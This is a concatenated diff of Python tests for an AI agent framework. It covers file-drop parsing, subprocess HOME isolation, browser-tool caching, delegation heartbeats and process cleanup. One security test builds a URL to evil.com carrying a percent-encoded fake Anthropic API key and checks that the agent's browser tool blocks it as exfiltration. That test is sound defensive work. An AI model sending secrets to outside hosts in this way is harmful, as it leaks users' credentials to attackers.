assert _detect_file_drop("/nonexistent/path/to/file.png") is None
def test_directory_not_file(self, tmp_path):
"""A directory path should not be treated as a file drop."""
assert _detect_file_drop(str(tmp_path)) is None
# ---------------------------------------------------------------------------
# Tests: image file detection
# ---------------------------------------------------------------------------
class TestImageFileDrop:
def test_simple_image_path(self, tmp_image):
result = _detect_file_drop(str(tmp_image))
assert result is not None
assert result["path"] == tmp_image
assert result["is_image"] is True
assert result["remainder"] == ""
def test_image_with_trailing_text(self, tmp_image):
user_input = f"{tmp_image} analyze this please"
result = _detect_file_drop(user_input)
assert result is not None
assert result["path"] == tmp_image
assert result["is_image"] is True
assert result["remainder"] == "analyze this please"
@pytest.mark.parametrize("ext", [".png", ".jpg", ".jpeg", ".gif", ".webp",
".bmp", ".tiff", ".tif", ".svg", ".ico"])
def test_all_image_extensions(self, tmp_path, ext):
img = tmp_path / f"test{ext}"
img.write_bytes(b"fake")
result = _detect_file_drop(str(img))
assert result is not None
assert result["is_image"] is True
def test_uppercase_extension(self, tmp_path):
img = tmp_path / "photo.JPG"
img.write_bytes(b"fake")
result = _detect_file_drop(str(img))
assert result is not None
assert result["is_image"] is True
# ---------------------------------------------------------------------------
# Tests: non-image file detection
# ---------------------------------------------------------------------------
class TestNonImageFileDrop:
def test_python_file(self, tmp_text):
result = _detect_file_drop(str(tmp_text))
assert result is not None
assert result["path"] == tmp_text
assert result["is_image"] is False
assert result["remainder"] == ""
def test_non_image_with_trailing_text(self, tmp_text):
user_input = f"{tmp_text} review this code"
result = _detect_file_drop(user_input)
assert result is not None
assert result["is_image"] is False
assert result["remainder"] == "review this code"
# ---------------------------------------------------------------------------
# Tests: backslash-escaped spaces (macOS drag-and-drop)
# ---------------------------------------------------------------------------
class TestEscapedSpaces:
def test_escaped_spaces_in_path(self, tmp_image_with_spaces):
r"""macOS drags produce paths like /path/to/my\ file.png"""
escaped = str(tmp_image_with_spaces).replace(' ', '\\ ')
result = _detect_file_drop(escaped)
assert result is not None
assert result["path"] == tmp_image_with_spaces
assert result["is_image"] is True
def test_escaped_spaces_with_trailing_text(self, tmp_image_with_spaces):
escaped = str(tmp_image_with_spaces).replace(' ', '\\ ')
user_input = f"{escaped} what is this?"
result = _detect_file_drop(user_input)
assert result is not None
assert result["path"] == tmp_image_with_spaces
assert result["remainder"] == "what is this?"
# ---------------------------------------------------------------------------
# Tests: edge cases
# ---------------------------------------------------------------------------
class TestEdgeCases:
def test_path_with_no_extension(self, tmp_path):
f = tmp_path / "Makefile"
f.write_text("all:\n\techo hi\n")
result = _detect_file_drop(str(f))
assert result is not None
assert result["is_image"] is False
def test_path_that_looks_like_command_but_is_file(self, tmp_path):
"""A file literally named 'help' inside a directory starting with /."""
f = tmp_path / "help"
f.write_text("not a command\n")
result = _detect_file_drop(str(f))
assert result is not None
assert result["is_image"] is False
def test_symlink_to_file(self, tmp_image, tmp_path):
link = tmp_path / "link.png"
link.symlink_to(tmp_image)
result = _detect_file_drop(str(link))
assert result is not None
assert result["is_image"] is True

View File

@@ -0,0 +1,198 @@
"""Tests for per-profile subprocess HOME isolation (#4426).
Verifies that subprocesses (terminal, execute_code, background processes)
receive a per-profile HOME directory while the Python process's own HOME
and Path.home() remain unchanged.
See: https://github.com/NousResearch/hermes-agent/issues/4426
"""
import os
from pathlib import Path
from unittest.mock import patch
import pytest
# ---------------------------------------------------------------------------
# get_subprocess_home()
# ---------------------------------------------------------------------------
class TestGetSubprocessHome:
"""Unit tests for hermes_constants.get_subprocess_home()."""
def test_returns_none_when_hermes_home_unset(self, monkeypatch):
monkeypatch.delenv("HERMES_HOME", raising=False)
from hermes_constants import get_subprocess_home
assert get_subprocess_home() is None
def test_returns_none_when_home_dir_missing(self, tmp_path, monkeypatch):
hermes_home = tmp_path / ".hermes"
hermes_home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
# No home/ subdirectory created
from hermes_constants import get_subprocess_home
assert get_subprocess_home() is None
def test_returns_path_when_home_dir_exists(self, tmp_path, monkeypatch):
hermes_home = tmp_path / ".hermes"
hermes_home.mkdir()
profile_home = hermes_home / "home"
profile_home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
from hermes_constants import get_subprocess_home
assert get_subprocess_home() == str(profile_home)
def test_returns_profile_specific_path(self, tmp_path, monkeypatch):
"""Named profiles get their own isolated HOME."""
profile_dir = tmp_path / ".hermes" / "profiles" / "coder"
profile_dir.mkdir(parents=True)
profile_home = profile_dir / "home"
profile_home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(profile_dir))
from hermes_constants import get_subprocess_home
assert get_subprocess_home() == str(profile_home)
def test_two_profiles_get_different_homes(self, tmp_path, monkeypatch):
base = tmp_path / ".hermes" / "profiles"
for name in ("alpha", "beta"):
p = base / name
p.mkdir(parents=True)
(p / "home").mkdir()
from hermes_constants import get_subprocess_home
monkeypatch.setenv("HERMES_HOME", str(base / "alpha"))
home_a = get_subprocess_home()
monkeypatch.setenv("HERMES_HOME", str(base / "beta"))
home_b = get_subprocess_home()
assert home_a != home_b
assert home_a.endswith("alpha/home")
assert home_b.endswith("beta/home")
# ---------------------------------------------------------------------------
# _make_run_env() injection
# ---------------------------------------------------------------------------
class TestMakeRunEnvHomeInjection:
"""Verify _make_run_env() injects HOME into subprocess envs."""
def test_injects_home_when_profile_home_exists(self, tmp_path, monkeypatch):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
(hermes_home / "home").mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
monkeypatch.setenv("HOME", "/root")
monkeypatch.setenv("PATH", "/usr/bin:/bin")
from tools.environments.local import _make_run_env
result = _make_run_env({})
assert result["HOME"] == str(hermes_home / "home")
def test_no_injection_when_home_dir_missing(self, tmp_path, monkeypatch):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
# No home/ subdirectory
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
monkeypatch.setenv("HOME", "/root")
monkeypatch.setenv("PATH", "/usr/bin:/bin")
from tools.environments.local import _make_run_env
result = _make_run_env({})
assert result["HOME"] == "/root"
def test_no_injection_when_hermes_home_unset(self, monkeypatch):
monkeypatch.delenv("HERMES_HOME", raising=False)
monkeypatch.setenv("HOME", "/home/user")
monkeypatch.setenv("PATH", "/usr/bin:/bin")
from tools.environments.local import _make_run_env
result = _make_run_env({})
assert result["HOME"] == "/home/user"
# ---------------------------------------------------------------------------
# _sanitize_subprocess_env() injection
# ---------------------------------------------------------------------------
class TestSanitizeSubprocessEnvHomeInjection:
"""Verify _sanitize_subprocess_env() injects HOME for background procs."""
def test_injects_home_when_profile_home_exists(self, tmp_path, monkeypatch):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
(hermes_home / "home").mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
base_env = {"HOME": "/root", "PATH": "/usr/bin", "USER": "root"}
from tools.environments.local import _sanitize_subprocess_env
result = _sanitize_subprocess_env(base_env)
assert result["HOME"] == str(hermes_home / "home")
def test_no_injection_when_home_dir_missing(self, tmp_path, monkeypatch):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
base_env = {"HOME": "/root", "PATH": "/usr/bin"}
from tools.environments.local import _sanitize_subprocess_env
result = _sanitize_subprocess_env(base_env)
assert result["HOME"] == "/root"
# ---------------------------------------------------------------------------
# Profile bootstrap
# ---------------------------------------------------------------------------
class TestProfileBootstrap:
"""Verify new profiles get a home/ subdirectory."""
def test_profile_dirs_includes_home(self):
from hermes_cli.profiles import _PROFILE_DIRS
assert "home" in _PROFILE_DIRS
def test_create_profile_bootstraps_home_dir(self, tmp_path, monkeypatch):
"""create_profile() should create home/ inside the profile dir."""
home = tmp_path / ".hermes"
home.mkdir()
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(home))
from hermes_cli.profiles import create_profile
profile_dir = create_profile("testbot", no_alias=True)
assert (profile_dir / "home").is_dir()
# ---------------------------------------------------------------------------
# Python process HOME unchanged
# ---------------------------------------------------------------------------
class TestPythonProcessUnchanged:
"""Confirm the Python process's own HOME is never modified."""
def test_path_home_unchanged_after_subprocess_home_resolved(
self, tmp_path, monkeypatch
):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
(hermes_home / "home").mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
original_home = os.environ.get("HOME")
original_path_home = str(Path.home())
from hermes_constants import get_subprocess_home
sub_home = get_subprocess_home()
# Subprocess home is set but Python HOME stays the same
assert sub_home is not None
assert os.environ.get("HOME") == original_home
assert str(Path.home()) == original_path_home

View File

@@ -0,0 +1,271 @@
"""Tests for browser_tool.py hardening: caching, security, thread safety, truncation."""
import inspect
import os
from unittest.mock import MagicMock, patch
import pytest
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _reset_caches():
"""Reset all module-level caches so tests start clean."""
import tools.browser_tool as bt
bt._cached_agent_browser = None
bt._agent_browser_resolved = False
bt._cached_command_timeout = None
bt._command_timeout_resolved = False
# lru_cache for _discover_homebrew_node_dirs
if hasattr(bt._discover_homebrew_node_dirs, "cache_clear"):
bt._discover_homebrew_node_dirs.cache_clear()
@pytest.fixture(autouse=True)
def _clean_caches():
_reset_caches()
yield
_reset_caches()
# ---------------------------------------------------------------------------
# Dead code removal
# ---------------------------------------------------------------------------
class TestDeadCodeRemoval:
"""Verify dead code was actually removed."""
def test_no_default_session_timeout(self):
import tools.browser_tool as bt
assert not hasattr(bt, "DEFAULT_SESSION_TIMEOUT")
def test_browser_close_schema_removed(self):
from tools.browser_tool import BROWSER_TOOL_SCHEMAS
names = [s["name"] for s in BROWSER_TOOL_SCHEMAS]
assert "browser_close" not in names
# ---------------------------------------------------------------------------
# Caching: _find_agent_browser
# ---------------------------------------------------------------------------
class TestFindAgentBrowserCache:
def test_cached_after_first_call(self):
import tools.browser_tool as bt
with patch("shutil.which", return_value="/usr/bin/agent-browser"):
result1 = bt._find_agent_browser()
result2 = bt._find_agent_browser()
assert result1 == result2 == "/usr/bin/agent-browser"
assert bt._agent_browser_resolved is True
def test_cache_cleared_by_cleanup(self):
import tools.browser_tool as bt
bt._cached_agent_browser = "/fake/path"
bt._agent_browser_resolved = True
bt.cleanup_all_browsers()
assert bt._agent_browser_resolved is False
def test_not_found_cached_raises_on_subsequent(self):
"""After FileNotFoundError, subsequent calls should raise from cache."""
import tools.browser_tool as bt
from pathlib import Path
original_exists = Path.exists
def mock_exists(self):
if "node_modules" in str(self) and "agent-browser" in str(self):
return False
return original_exists(self)
with patch("shutil.which", return_value=None), \
patch("os.path.isdir", return_value=False), \
patch.object(Path, "exists", mock_exists):
with pytest.raises(FileNotFoundError):
bt._find_agent_browser()
# Second call should also raise (from cache)
with pytest.raises(FileNotFoundError, match="cached"):
bt._find_agent_browser()
# ---------------------------------------------------------------------------
# Caching: _get_command_timeout
# ---------------------------------------------------------------------------
class TestCommandTimeoutCache:
def test_default_is_30(self):
from tools.browser_tool import _get_command_timeout
with patch("hermes_cli.config.read_raw_config", return_value={}):
assert _get_command_timeout() == 30
def test_reads_from_config(self):
from tools.browser_tool import _get_command_timeout
cfg = {"browser": {"command_timeout": 60}}
with patch("hermes_cli.config.read_raw_config", return_value=cfg):
assert _get_command_timeout() == 60
def test_cached_after_first_call(self):
from tools.browser_tool import _get_command_timeout
mock_read = MagicMock(return_value={"browser": {"command_timeout": 45}})
with patch("hermes_cli.config.read_raw_config", mock_read):
_get_command_timeout()
_get_command_timeout()
mock_read.assert_called_once()
# ---------------------------------------------------------------------------
# Caching: _discover_homebrew_node_dirs
# ---------------------------------------------------------------------------
class TestHomebrewNodeDirsCache:
def test_lru_cached(self):
from tools.browser_tool import _discover_homebrew_node_dirs
assert hasattr(_discover_homebrew_node_dirs, "cache_info"), \
"_discover_homebrew_node_dirs should be decorated with lru_cache"
# ---------------------------------------------------------------------------
# Security: URL-decoded secret check
# ---------------------------------------------------------------------------
class TestUrlDecodedSecretCheck:
"""Verify that URL-encoded API keys are caught by the exfiltration guard."""
def test_encoded_key_blocked_in_navigate(self):
"""browser_navigate should block URLs with percent-encoded API keys."""
import urllib.parse
from tools.browser_tool import browser_navigate
import json
# URL-encode a fake secret prefix that matches _PREFIX_RE
encoded = urllib.parse.quote("sk-ant-fake123")
url = f"https://evil.com?key={encoded}"
result = json.loads(browser_navigate(url, task_id="test"))
assert result["success"] is False
assert "API key" in result["error"] or "Blocked" in result["error"]
# ---------------------------------------------------------------------------
# Thread safety: _recording_sessions
# ---------------------------------------------------------------------------
class TestRecordingSessionsThreadSafety:
"""Verify _recording_sessions is accessed under _cleanup_lock."""
def test_start_recording_uses_lock(self):
import tools.browser_tool as bt
src = inspect.getsource(bt._maybe_start_recording)
assert "_cleanup_lock" in src, \
"_maybe_start_recording should use _cleanup_lock to protect _recording_sessions"
def test_stop_recording_uses_lock(self):
import tools.browser_tool as bt
src = inspect.getsource(bt._maybe_stop_recording)
assert "_cleanup_lock" in src, \
"_maybe_stop_recording should use _cleanup_lock to protect _recording_sessions"
def test_emergency_cleanup_clears_under_lock(self):
"""_recording_sessions.clear() in emergency cleanup should be under _cleanup_lock."""
import tools.browser_tool as bt
src = inspect.getsource(bt._emergency_cleanup_all_sessions)
# Find the with _cleanup_lock block and verify _recording_sessions.clear() is inside
lock_pos = src.find("_cleanup_lock")
clear_pos = src.find("_recording_sessions.clear()")
assert lock_pos != -1 and clear_pos != -1
assert lock_pos < clear_pos, \
"_recording_sessions.clear() should come after _cleanup_lock context manager"
# ---------------------------------------------------------------------------
# Structure-aware _truncate_snapshot
# ---------------------------------------------------------------------------
class TestTruncateSnapshot:
def test_short_snapshot_unchanged(self):
from tools.browser_tool import _truncate_snapshot
short = '- heading "Example" [ref=e1]\n- link "More" [ref=e2]'
assert _truncate_snapshot(short) == short
def test_long_snapshot_truncated_at_line_boundary(self):
from tools.browser_tool import _truncate_snapshot
# Create a snapshot that exceeds 8000 chars
lines = [f'- item "Element {i}" [ref=e{i}]' for i in range(500)]
snapshot = "\n".join(lines)
assert len(snapshot) > 8000
result = _truncate_snapshot(snapshot, max_chars=200)
assert len(result) <= 300 # some margin for the truncation note
assert "truncated" in result.lower()
# Every line in the result should be complete (not cut mid-element)
for line in result.split("\n"):
if line.strip() and "truncated" not in line.lower():
assert line.startswith("- item") or line == ""
def test_truncation_reports_remaining_count(self):
from tools.browser_tool import _truncate_snapshot
lines = [f"- line {i}" for i in range(100)]
snapshot = "\n".join(lines)
result = _truncate_snapshot(snapshot, max_chars=200)
# Should mention how many lines were truncated
assert "more line" in result.lower()
# ---------------------------------------------------------------------------
# Scroll optimization
# ---------------------------------------------------------------------------
class TestScrollOptimization:
def test_agent_browser_path_uses_pixel_scroll(self):
"""Verify agent-browser path uses single pixel-based scroll, not 5x loop."""
import tools.browser_tool as bt
src = inspect.getsource(bt.browser_scroll)
assert "_SCROLL_PIXELS" in src, \
"browser_scroll should use _SCROLL_PIXELS for agent-browser path"
# ---------------------------------------------------------------------------
# Empty stdout = failure
# ---------------------------------------------------------------------------
class TestEmptyStdoutFailure:
def test_empty_stdout_returns_failure(self):
"""Verify _run_browser_command returns failure on empty stdout."""
import tools.browser_tool as bt
src = inspect.getsource(bt._run_browser_command)
assert "returned no output" in src, \
"_run_browser_command should treat empty stdout as failure"
def test_empty_ok_commands_is_module_level_frozenset(self):
"""_EMPTY_OK_COMMANDS should be a module-level frozenset, not defined inside a function."""
import tools.browser_tool as bt
assert hasattr(bt, "_EMPTY_OK_COMMANDS")
assert isinstance(bt._EMPTY_OK_COMMANDS, frozenset)
assert "close" in bt._EMPTY_OK_COMMANDS
assert "record" in bt._EMPTY_OK_COMMANDS
# ---------------------------------------------------------------------------
# _camofox_eval bug fix
# ---------------------------------------------------------------------------
class TestCamofoxEvalFix:
def test_uses_correct_ensure_tab_signature(self):
"""_camofox_eval should pass task_id string to _ensure_tab, not a session dict."""
import tools.browser_tool as bt
src = inspect.getsource(bt._camofox_eval)
# Should NOT call _get_session at all — _ensure_tab handles it
assert "_get_session" not in src, \
"_camofox_eval should not call _get_session (removed unused import)"
# Should use body= not json_data=
assert "json_data=" not in src, \
"_camofox_eval should use body= kwarg for _post, not json_data="
assert "body=" in src

View File

@@ -15,6 +15,19 @@ from tools.browser_tool import (
_SANE_PATH,
check_browser_requirements,
)
import tools.browser_tool as _bt
@pytest.fixture(autouse=True)
def _clear_browser_caches():
"""Clear lru_cache and manual caches between tests."""
_discover_homebrew_node_dirs.cache_clear()
_bt._cached_agent_browser = None
_bt._agent_browser_resolved = False
yield
_discover_homebrew_node_dirs.cache_clear()
_bt._cached_agent_browser = None
_bt._agent_browser_resolved = False
class TestSanePath:
@@ -38,7 +51,7 @@ class TestDiscoverHomebrewNodeDirs:
def test_returns_empty_when_no_homebrew(self):
"""Non-macOS systems without /opt/homebrew/opt should return empty."""
with patch("os.path.isdir", return_value=False):
assert _discover_homebrew_node_dirs() == []
assert _discover_homebrew_node_dirs() == ()
def test_finds_versioned_node_dirs(self):
"""Should discover node@20/bin, node@24/bin etc."""
@@ -68,13 +81,13 @@ class TestDiscoverHomebrewNodeDirs:
with patch("os.path.isdir", return_value=True), \
patch("os.listdir", return_value=["node"]):
result = _discover_homebrew_node_dirs()
assert result == []
assert result == ()
def test_handles_oserror_gracefully(self):
"""Should return empty list if listdir raises OSError."""
with patch("os.path.isdir", return_value=True), \
patch("os.listdir", side_effect=OSError("Permission denied")):
assert _discover_homebrew_node_dirs() == []
assert _discover_homebrew_node_dirs() == ()
class TestFindAgentBrowser:

View File

@@ -13,13 +13,14 @@ import json
import os
import sys
import threading
import time
import unittest
from unittest.mock import MagicMock, patch
from tools.delegate_tool import (
DELEGATE_BLOCKED_TOOLS,
DELEGATE_TASK_SCHEMA,
MAX_CONCURRENT_CHILDREN,
_get_max_concurrent_children,
MAX_DEPTH,
check_delegate_requirements,
delegate_task,
@@ -66,7 +67,7 @@ class TestDelegateRequirements(unittest.TestCase):
self.assertIn("context", props)
self.assertIn("toolsets", props)
self.assertIn("max_iterations", props)
self.assertEqual(props["tasks"]["maxItems"], 3)
self.assertNotIn("maxItems", props["tasks"]) # removed — limit is now runtime-configurable
class TestChildSystemPrompt(unittest.TestCase):
@@ -167,10 +168,13 @@ class TestDelegateTask(unittest.TestCase):
"summary": "Done", "api_calls": 1, "duration_seconds": 1.0
}
parent = _make_mock_parent()
tasks = [{"goal": f"Task {i}"} for i in range(5)]
limit = _get_max_concurrent_children()
tasks = [{"goal": f"Task {i}"} for i in range(limit + 2)]
result = json.loads(delegate_task(tasks=tasks, parent_agent=parent))
# Should only run 3 tasks (MAX_CONCURRENT_CHILDREN)
self.assertEqual(mock_run.call_count, 3)
# Should return an error instead of silently truncating
self.assertIn("error", result)
self.assertIn("Too many tasks", result["error"])
mock_run.assert_not_called()
@patch("tools.delegate_tool._run_single_child")
def test_batch_ignores_toplevel_goal(self, mock_run):
@@ -561,7 +565,7 @@ class TestBlockedTools(unittest.TestCase):
self.assertIn(tool, DELEGATE_BLOCKED_TOOLS)
def test_constants(self):
self.assertEqual(MAX_CONCURRENT_CHILDREN, 3)
self.assertEqual(_get_max_concurrent_children(), 3)
self.assertEqual(MAX_DEPTH, 2)
@@ -1052,5 +1056,159 @@ class TestChildCredentialLeasing(unittest.TestCase):
child._credential_pool.release_lease.assert_called_once_with("cred-a")
class TestDelegateHeartbeat(unittest.TestCase):
"""Heartbeat propagates child activity to parent during delegation.
Without the heartbeat, the gateway inactivity timeout fires because the
parent's _last_activity_ts freezes when delegate_task starts.
"""
def test_heartbeat_touches_parent_activity_during_child_run(self):
"""Parent's _touch_activity is called while child.run_conversation blocks."""
from tools.delegate_tool import _run_single_child
parent = _make_mock_parent()
touch_calls = []
parent._touch_activity = lambda desc: touch_calls.append(desc)
child = MagicMock()
child.get_activity_summary.return_value = {
"current_tool": "terminal",
"api_call_count": 3,
"max_iterations": 50,
"last_activity_desc": "executing tool: terminal",
}
# Make run_conversation block long enough for heartbeats to fire
def slow_run(**kwargs):
time.sleep(0.25)
return {"final_response": "done", "completed": True, "api_calls": 3}
child.run_conversation.side_effect = slow_run
# Patch the heartbeat interval to fire quickly
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
_run_single_child(
task_index=0,
goal="Test heartbeat",
child=child,
parent_agent=parent,
)
# Heartbeat should have fired at least once during the 0.25s sleep
self.assertGreater(len(touch_calls), 0,
"Heartbeat did not propagate activity to parent")
# Verify the description includes child's current tool detail
self.assertTrue(
any("terminal" in desc for desc in touch_calls),
f"Heartbeat descriptions should include child tool info: {touch_calls}")
def test_heartbeat_stops_after_child_completes(self):
"""Heartbeat thread is cleaned up when the child finishes."""
from tools.delegate_tool import _run_single_child
parent = _make_mock_parent()
touch_calls = []
parent._touch_activity = lambda desc: touch_calls.append(desc)
child = MagicMock()
child.get_activity_summary.return_value = {
"current_tool": None,
"api_call_count": 1,
"max_iterations": 50,
"last_activity_desc": "done",
}
child.run_conversation.return_value = {
"final_response": "done", "completed": True, "api_calls": 1,
}
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
_run_single_child(
task_index=0,
goal="Test cleanup",
child=child,
parent_agent=parent,
)
# Record count after completion, wait, and verify no more calls
count_after = len(touch_calls)
time.sleep(0.15)
self.assertEqual(len(touch_calls), count_after,
"Heartbeat continued firing after child completed")
def test_heartbeat_stops_after_child_error(self):
"""Heartbeat thread is cleaned up even when the child raises."""
from tools.delegate_tool import _run_single_child
parent = _make_mock_parent()
touch_calls = []
parent._touch_activity = lambda desc: touch_calls.append(desc)
child = MagicMock()
child.get_activity_summary.return_value = {
"current_tool": "web_search",
"api_call_count": 2,
"max_iterations": 50,
"last_activity_desc": "executing tool: web_search",
}
def slow_fail(**kwargs):
time.sleep(0.15)
raise RuntimeError("network timeout")
child.run_conversation.side_effect = slow_fail
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
result = _run_single_child(
task_index=0,
goal="Test error cleanup",
child=child,
parent_agent=parent,
)
self.assertEqual(result["status"], "error")
# Verify heartbeat stopped
count_after = len(touch_calls)
time.sleep(0.15)
self.assertEqual(len(touch_calls), count_after,
"Heartbeat continued firing after child error")
def test_heartbeat_includes_child_activity_desc_when_no_tool(self):
"""When child has no current_tool, heartbeat uses last_activity_desc."""
from tools.delegate_tool import _run_single_child
parent = _make_mock_parent()
touch_calls = []
parent._touch_activity = lambda desc: touch_calls.append(desc)
child = MagicMock()
child.get_activity_summary.return_value = {
"current_tool": None,
"api_call_count": 5,
"max_iterations": 90,
"last_activity_desc": "API call #5 completed",
}
def slow_run(**kwargs):
time.sleep(0.15)
return {"final_response": "done", "completed": True, "api_calls": 5}
child.run_conversation.side_effect = slow_run
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
_run_single_child(
task_index=0,
goal="Test desc fallback",
child=child,
parent_agent=parent,
)
self.assertGreater(len(touch_calls), 0)
self.assertTrue(
any("API call #5 completed" in desc for desc in touch_calls),
f"Heartbeat should include last_activity_desc: {touch_calls}")
if __name__ == "__main__":
unittest.main()

View File

@@ -1,274 +0,0 @@
"""Tests for zombie process cleanup — verifies processes spawned by tools
are properly reaped when agent sessions end.
Reproduction for issue #7131: zombie process accumulation on long-running
gateway deployments.
"""
import os
import signal
import subprocess
import sys
import time
import threading
import pytest
def _spawn_sleep(seconds: float = 60) -> subprocess.Popen:
"""Spawn a portable long-lived Python sleep process (no shell wrapper)."""
return subprocess.Popen(
[sys.executable, "-c", f"import time; time.sleep({seconds})"],
)
def _pid_alive(pid: int) -> bool:
"""Return True if a process with the given PID is still running."""
try:
os.kill(pid, 0)
return True
except (ProcessLookupError, PermissionError):
return False
class TestZombieReproduction:
"""Demonstrate that subprocesses survive when cleanup is not called."""
def test_orphaned_processes_survive_without_cleanup(self):
"""REPRODUCTION: processes spawned directly survive if no one kills
them — this models the gap that causes zombie accumulation when
the gateway drops agent references without calling close()."""
pids = []
try:
for _ in range(3):
proc = _spawn_sleep(60)
pids.append(proc.pid)
for pid in pids:
assert _pid_alive(pid), f"PID {pid} should be alive after spawn"
# Simulate "session end" by just dropping the reference
del proc # noqa: F821
# BUG: processes are still alive after reference is dropped
for pid in pids:
assert _pid_alive(pid), (
f"PID {pid} died after ref drop — "
f"expected it to survive (demonstrating the bug)"
)
finally:
for pid in pids:
try:
os.kill(pid, signal.SIGKILL)
except (ProcessLookupError, PermissionError):
pass
def test_explicit_terminate_reaps_processes(self):
"""Explicitly terminating+waiting on Popen handles works.
This models what ProcessRegistry.kill_process does internally."""
procs = []
try:
for _ in range(3):
proc = _spawn_sleep(60)
procs.append(proc)
for proc in procs:
assert _pid_alive(proc.pid)
for proc in procs:
proc.terminate()
proc.wait(timeout=5)
for proc in procs:
assert proc.returncode is not None, (
f"PID {proc.pid} should have exited after terminate+wait"
)
finally:
for proc in procs:
try:
proc.kill()
proc.wait(timeout=1)
except Exception:
pass
class TestAgentCloseMethod:
"""Verify AIAgent.close() exists, is idempotent, and calls cleanup."""
def test_close_calls_cleanup_functions(self):
"""close() should call kill_all, cleanup_vm, cleanup_browser."""
from unittest.mock import patch
with patch("run_agent.AIAgent.__init__", return_value=None):
from run_agent import AIAgent
agent = AIAgent.__new__(AIAgent)
agent.session_id = "test-close-cleanup"
agent._active_children = []
agent._active_children_lock = threading.Lock()
agent.client = None
with patch("tools.process_registry.process_registry") as mock_registry, \
patch("tools.terminal_tool.cleanup_vm") as mock_cleanup_vm, \
patch("tools.browser_tool.cleanup_browser") as mock_cleanup_browser:
agent.close()
mock_registry.kill_all.assert_called_once_with(
task_id="test-close-cleanup"
)
mock_cleanup_vm.assert_called_once_with("test-close-cleanup")
mock_cleanup_browser.assert_called_once_with("test-close-cleanup")
def test_close_is_idempotent(self):
"""close() can be called multiple times without error."""
from unittest.mock import patch
with patch("run_agent.AIAgent.__init__", return_value=None):
from run_agent import AIAgent
agent = AIAgent.__new__(AIAgent)
agent.session_id = "test-close-idempotent"
agent._active_children = []
agent._active_children_lock = threading.Lock()
agent.client = None
agent.close()
agent.close()
agent.close()
def test_close_propagates_to_children(self):
"""close() should call close() on all active child agents."""
from unittest.mock import MagicMock, patch
with patch("run_agent.AIAgent.__init__", return_value=None):
from run_agent import AIAgent
agent = AIAgent.__new__(AIAgent)
agent.session_id = "test-close-children"
agent._active_children_lock = threading.Lock()
agent.client = None
child_1 = MagicMock()
child_2 = MagicMock()
agent._active_children = [child_1, child_2]
agent.close()
child_1.close.assert_called_once()
child_2.close.assert_called_once()
assert agent._active_children == []
def test_close_survives_partial_failures(self):
"""close() continues cleanup even if one step fails."""
from unittest.mock import patch
with patch("run_agent.AIAgent.__init__", return_value=None):
from run_agent import AIAgent
agent = AIAgent.__new__(AIAgent)
agent.session_id = "test-close-partial"
agent._active_children = []
agent._active_children_lock = threading.Lock()
agent.client = None
with patch(
"tools.process_registry.process_registry"
) as mock_reg, patch(
"tools.terminal_tool.cleanup_vm"
) as mock_vm, patch(
"tools.browser_tool.cleanup_browser"
) as mock_browser:
mock_reg.kill_all.side_effect = RuntimeError("boom")
agent.close()
mock_vm.assert_called_once()
mock_browser.assert_called_once()
class TestGatewayCleanupWiring:
"""Verify gateway lifecycle calls close() on agents."""
def test_gateway_stop_calls_close(self):
"""gateway stop() should call close() on all running agents."""
import asyncio
from unittest.mock import MagicMock, patch
runner = MagicMock()
runner._running = True
runner._running_agents = {}
runner.adapters = {}
runner._background_tasks = set()
runner._pending_messages = {}
runner._pending_approvals = {}
runner._shutdown_event = asyncio.Event()
runner._exit_reason = None
mock_agent_1 = MagicMock()
mock_agent_2 = MagicMock()
runner._running_agents = {
"session-1": mock_agent_1,
"session-2": mock_agent_2,
}
from gateway.run import GatewayRunner
loop = asyncio.new_event_loop()
try:
with patch("gateway.status.remove_pid_file"), \
patch("gateway.status.write_runtime_status"), \
patch("tools.terminal_tool.cleanup_all_environments"), \
patch("tools.browser_tool.cleanup_all_browsers"):
loop.run_until_complete(GatewayRunner.stop(runner))
finally:
loop.close()
mock_agent_1.close.assert_called()
mock_agent_2.close.assert_called()
def test_evict_does_not_call_close(self):
"""_evict_cached_agent() should NOT call close() — it's also used
for non-destructive refreshes (model switch, branch, fallback)."""
import threading
from unittest.mock import MagicMock
from gateway.run import GatewayRunner
runner = object.__new__(GatewayRunner)
runner._agent_cache_lock = threading.Lock()
mock_agent = MagicMock()
runner._agent_cache = {"session-key": (mock_agent, 12345)}
GatewayRunner._evict_cached_agent(runner, "session-key")
mock_agent.close.assert_not_called()
assert "session-key" not in runner._agent_cache
class TestDelegationCleanup:
"""Verify subagent delegation cleans up child agents."""
def test_run_single_child_calls_close(self):
"""_run_single_child finally block should call close() on child."""
from unittest.mock import MagicMock
from tools.delegate_tool import _run_single_child
parent = MagicMock()
parent._active_children = []
parent._active_children_lock = threading.Lock()
child = MagicMock()
child._delegate_saved_tool_names = ["tool1"]
child.run_conversation.side_effect = RuntimeError("test abort")
parent._active_children.append(child)
result = _run_single_child(
task_index=0,
goal="test goal",
child=child,
parent_agent=parent,
)
child.close.assert_called_once()
assert child not in parent._active_children
assert result["status"] == "error"

View File

@@ -50,6 +50,7 @@ Usage:
"""
import atexit
import functools
import json
import logging
import os
@@ -100,27 +101,27 @@ _SANE_PATH = (
)
def _discover_homebrew_node_dirs() -> list[str]:
@functools.lru_cache(maxsize=1)
def _discover_homebrew_node_dirs() -> tuple[str, ...]:
"""Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24).
When Node is installed via ``brew install node@24`` and NOT linked into
/opt/homebrew/bin, the binary lives only in /opt/homebrew/opt/node@24/bin/.
